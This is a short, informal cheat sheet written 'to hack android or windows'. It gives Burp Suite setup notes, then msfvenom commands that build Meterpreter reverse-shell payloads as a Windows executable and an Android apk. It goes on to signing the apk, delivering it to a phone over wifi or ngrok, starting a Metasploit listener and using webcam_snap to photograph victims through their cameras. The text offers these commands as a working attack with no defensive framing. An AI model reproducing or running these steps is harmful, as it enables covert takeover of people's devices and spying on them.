1. Install brup suit [default in kali - it will take chromium browser]
2. Add FoxyProxy
1. Install brup suit [default in kali - it will take chromium browser]
2. Add FoxyProxy
to hack android or windows
we are using msfvenom tool/command
1. Creating a malicious .exe file or .apk for android, below command to create a virus file
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe
android
1. use this command to generate apk file
2. signed with openssl, send that apk to mobile. right now it is in local ip, so send to same wifi network mobile or use ngrock to generate static public ip
3. use the below commands to listen like server
sudo su
1.1 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.29.242 LPORT=4444 -o testing.apk
2.1 sudo apt-get update
sudo apt install -y default-jdk
sudo keytool -genkey -V -keystore key.keystore -alias emi -keyalg RSA -keysize 2048 -validity 10000
sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore testing.apk emi
sudo jarsigner -verify -verbose -certs testing.apk
3.1 msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.29.242
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > exploit
4.1 sysinfo - to see which andoid is hacked
help
webcam_list
webcam_snap -i 2 1. for back camera, 2. for front camera, like wise use all the commands from help